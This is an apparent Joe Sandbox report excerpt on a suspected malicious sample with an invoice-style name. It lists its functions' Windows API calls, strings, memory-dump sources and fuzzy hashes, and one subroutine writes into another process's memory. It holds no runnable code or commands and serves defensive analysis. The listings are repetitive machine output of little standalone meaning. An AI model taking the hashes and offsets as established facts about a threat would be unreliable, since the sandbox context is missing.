Function 004AB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004AB0BA
StrokeAndFillPath.GDI32(?,?,0050E680,00000000,?,?,?), ref: 004AB0D6
SelectObject.GDI32(?,00000000), ref: 004AB0E9
DeleteObject.GDI32 ref: 004AB0FC
StrokePath.GDI32(?), ref: 004AB117

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 357c78596fdb6231214f31718593ac98b5259625ace6fe9161f4cb03095eb4ca
Instruction ID: 94be6d3d1b19f80334b796c2b80eae8c187590a2be7f09b99f72af334524976f
Opcode Fuzzy Hash: 357c78596fdb6231214f31718593ac98b5259625ace6fe9161f4cb03095eb4ca
Instruction Fuzzy Hash: C7F0F634004A08AFCB219FA5EC2C7963F64E7313A2F088319E429445F2C738895AEF68

Function 004DF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004DF2DA
CoCreateInstance.COMBASE(0051DA7C,00000000,00000001,0051D8EC,?), ref: 004DF2F2
CoUninitialize.COMBASE ref: 004DF555

Strings

.lnk, xrefs: 004DF28B, 004DF290, 004DF29E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 13ecbc2ef45701487fc046e7f5db5510ea7fd3e81dc97faa5eb678ff95eca3a1
Instruction ID: 50f9a927f1f2449268f543df13743406054041cd10463bd2f5c1628eac39b733
Opcode Fuzzy Hash: 13ecbc2ef45701487fc046e7f5db5510ea7fd3e81dc97faa5eb678ff95eca3a1
Instruction Fuzzy Hash: 28A18F71104201AFD700EF65C891DAFB7ECEF98718F00492EF15597292EB74E909CBA6

Function 004DE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0049660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004953B1,?,?,004961FF,?,00000000,00000001,00000000), ref: 0049662F

CoInitialize.OLE32(00000000), ref: 004DE85D
CoCreateInstance.COMBASE(0051DA7C,00000000,00000001,0051D8EC,?), ref: 004DE876
CoUninitialize.COMBASE ref: 004DE893

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

Strings

.lnk, xrefs: 004DE83B, 004DE84D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 552f0e82a3a65f0dec9151d86538fc7a938d33285ee80fdbbe206785d618d3aa
Instruction ID: aa6c0cc542f580b7980e1e02088ab3c0ddac37d9506d2381d9eb867e2d487e55
Opcode Fuzzy Hash: 552f0e82a3a65f0dec9151d86538fc7a938d33285ee80fdbbe206785d618d3aa
Instruction Fuzzy Hash: 20A186756043019FCB10EF25C49491ABBE5BF88314F00899EF9969B3A1CB36EC45CB95

Function 004B325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004B32ED

Part of subcall function 004BE0D0: __87except.LIBCMT ref: 004BE10B

Strings

pow, xrefs: 004B32C5, 004B32E2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 8df2f0996c47be33204c42f2af5000c817e6a3143f938f8e4a4b9a5f78e53471
Instruction ID: a14b14e1efc5313b52dca9d2ec68c1129884158140b87927b73bf92a9b66e928
Opcode Fuzzy Hash: 8df2f0996c47be33204c42f2af5000c817e6a3143f938f8e4a4b9a5f78e53471
Instruction Fuzzy Hash: 72515D2190820196CB196F1BC9413FB2BD49B91711F304D6BF485813D5DE3CCDD9A67E

Function 004D4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0052DC50,?,0000000F,0000000C,00000016,0052DC50,?), ref: 004D4645

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 004D46C5

Strings

REMOVE, xrefs: 004D4676
THIS, xrefs: 004D4703

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: bac1b808a5b83c7c8d4c3938ad18264980544ba4ce5193725301846a86864702
Instruction ID: c618cec2743226db50fe124f9a9edcb6d1342f77aa2eda3fc20e18a7929bae27
Opcode Fuzzy Hash: bac1b808a5b83c7c8d4c3938ad18264980544ba4ce5193725301846a86864702
Instruction Fuzzy Hash: B8416434A002199FCF00EF65C895AAEB7B5FF89308F14806BE916AB352D739DD45CB54

Function 004CC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004D430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004CBC08,?,?,00000034,00000800,?,00000034), ref: 004D4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004CC1D3

Part of subcall function 004D42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004CBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 004D4300

Part of subcall function 004D422F: GetWindowThreadProcessId.USER32(?,?), ref: 004D425A
Part of subcall function 004D422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004CBBCC,00000034,?,?,00001004,00000000,00000000), ref: 004D426A
Part of subcall function 004D422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004CBBCC,00000034,?,?,00001004,00000000,00000000), ref: 004D4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004CC240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004CC28D

Strings

@, xrefs: 004CC2A5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 1e1cbaae6865226d74b39aa6da6b1e8337e9ce6f8e1d58cee64795ac687b8772
Instruction ID: 7b89bef538c486f23dd7bbf090b8dc5373320672acbe09402d10f633cdbdf964
Opcode Fuzzy Hash: 1e1cbaae6865226d74b39aa6da6b1e8337e9ce6f8e1d58cee64795ac687b8772
Instruction Fuzzy Hash: 46415C76A00218BFDB10DFA4CC91EEEB7B8AF49304F04409AFA45B7281DA756E45CB65

Function 004FA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0052DC00,00000000,?,?,?,?), ref: 004FA6D8
GetWindowLongW.USER32 ref: 004FA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004FA705

Strings

SysTreeView32, xrefs: 004FA6AA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 5aeaacb2bd2bcf7665f055c220aebebf54874a6ebde98cba192449837a8e3185
Instruction ID: 86e4ad22bbbcc6a72e4270f0902b47033581123dcb2182c6914bf472989822f0
Opcode Fuzzy Hash: 5aeaacb2bd2bcf7665f055c220aebebf54874a6ebde98cba192449837a8e3185
Instruction Fuzzy Hash: C1319171100209ABDB119F34CC41BE77BA9FB49324F144716F979922E0C774E8609B59

Function 004E5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004E5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 004E51C6

Strings

DN, xrefs: 004E522E
|, xrefs: 004E51B5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$DN
API String ID: 1413715105-234596118
Opcode ID: dff3c3feedc673703d64e0361a1e4bcc87cb6abadf71daffbdd27e365da7e734
Instruction ID: c1250f8ddf435400251095061e7fcc7d6dc9a0826af5796fcffef230ab8c3b65
Opcode Fuzzy Hash: dff3c3feedc673703d64e0361a1e4bcc87cb6abadf71daffbdd27e365da7e734
Instruction Fuzzy Hash: FB313D71C00119ABCF01EFA5CC85AEE7FB9FF14708F00406AF915A6165DB35A916DBA4

Function 004FA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004FA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004FA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 004FA196

Strings

SysMonthCal32, xrefs: 004FA129

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: de6a86baed71376793b50dc6fcf0ccd3731960b1d91b6b802bacfd55392ab133
Instruction ID: 1f6ea34ef9b25c10f2e2eea77518e97575cae7ef34f9e0e6d54df0293eb3a2c1
Opcode Fuzzy Hash: de6a86baed71376793b50dc6fcf0ccd3731960b1d91b6b802bacfd55392ab133
Instruction Fuzzy Hash: CC21BF72500218ABDF118F94CC82FEA3B79FF48714F110215FA596B1D0D6B9AC65DBA4

Function 004FA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004FA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004FA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004FA956

Strings

msctls_updown32, xrefs: 004FA8BB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: c9fcd262702046a1f56d44451893db972239f7a086f167c3c8ee2137ae7930d2
Instruction ID: d72b220e0ba1e8f85711a77499709da83388e35b94cd688527889c8e698163b1
Opcode Fuzzy Hash: c9fcd262702046a1f56d44451893db972239f7a086f167c3c8ee2137ae7930d2
Instruction Fuzzy Hash: 9021AEF5600609AFDB10DF18CC91DB73BACEB5A3A8B05045AFA089B361CA74EC119B65

Function 004F99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004F9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004F9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004F9A65

Strings

Listbox, xrefs: 004F99FD

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 1e49acd2737ae4da4ba3ba57a9da40e3450477ee8e875f93279c89363748f1f6
Instruction ID: 40ab744f8003e8510c0c55b29ef989dd469eb7ee3068c39e26617d203951e2cd
Opcode Fuzzy Hash: 1e49acd2737ae4da4ba3ba57a9da40e3450477ee8e875f93279c89363748f1f6
Instruction Fuzzy Hash: B521C57261011CBFDF218F54CC85FBB3BAAEF89754F01812AFA44572A0C6759C519BA4

Function 004FA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004FA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004FA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004FA48F

Strings

msctls_trackbar32, xrefs: 004FA444

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 04ecb9911207d2838693d12479c7eec9d25b18c44aecc0d14b94bf0798bea207
Instruction ID: baa119fe459011bc254ff2e095dd395f12974e9891b93d7d2c02971aad2b7a6b
Opcode Fuzzy Hash: 04ecb9911207d2838693d12479c7eec9d25b18c44aecc0d14b94bf0798bea207
Instruction Fuzzy Hash: 2E11E7B1240208BEEF209F65CC49FEB3B69EF89758F014119FB4996191D6B5E821DB28

Function 004B2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 004B22A1
GetProcAddress.KERNEL32(00000000), ref: 004B22A8

Strings

combase.dll, xrefs: 004B229C
RoInitialize, xrefs: 004B2290

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: ff4b7fbdbf28536fa7bdbb1794bdd1ef3ba34ade133508ac3c46c368e57a9532
Instruction ID: 86669a7bff5941bca16a3307ff484c6ef1bd29087afb1607d3fd4076ae7cc9e8
Opcode Fuzzy Hash: ff4b7fbdbf28536fa7bdbb1794bdd1ef3ba34ade133508ac3c46c368e57a9532
Instruction Fuzzy Hash: 22E01A74AD4700ABEB505F70ED4EBD53A65BB21706F105060B102D51E0DBB94088EF2A

Function 004B235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004B2276), ref: 004B2376
GetProcAddress.KERNEL32(00000000), ref: 004B237D

Strings

combase.dll, xrefs: 004B2371
RoUninitialize, xrefs: 004B2365

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 000bc752dbad0c3754921fe01b119597c66dc63623f00f1387cb38ac82733596
Instruction ID: 76290859129b1f5b65c279c0f04186678fd1a306079a878c602af796c675fc5d
Opcode Fuzzy Hash: 000bc752dbad0c3754921fe01b119597c66dc63623f00f1387cb38ac82733596
Instruction Fuzzy Hash: 26E0B674588700ABEBA05F70ED1DB853AB5B731706F106414F90AD21F0DBBD5448EA26

Function 0050AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0050AC60
__swprintf.LIBCMT ref: 0050AC94

Strings

%.3d, xrefs: 0050AC6E
WIN_XPe, xrefs: 0050ACD3

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: eeb9b67e69caaa1b29ccb92961810ffd5eb6f0504fdf34d6d66316c13bc546bf
Instruction ID: 2713664b5613d1c2a96d5e87bc31b39c6b0d732b9a6c7f16811e2b9e78199356
Opcode Fuzzy Hash: eeb9b67e69caaa1b29ccb92961810ffd5eb6f0504fdf34d6d66316c13bc546bf
Instruction Fuzzy Hash: DEE012B1804B58DBDB109790CD05DFE777CB704741F510893F907A2090D7399F85AA27

Function 004F2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004F21FB,?,004F23EF), ref: 004F2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 004F2225

Strings

GetProcessId, xrefs: 004F221F
kernel32.dll, xrefs: 004F220E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
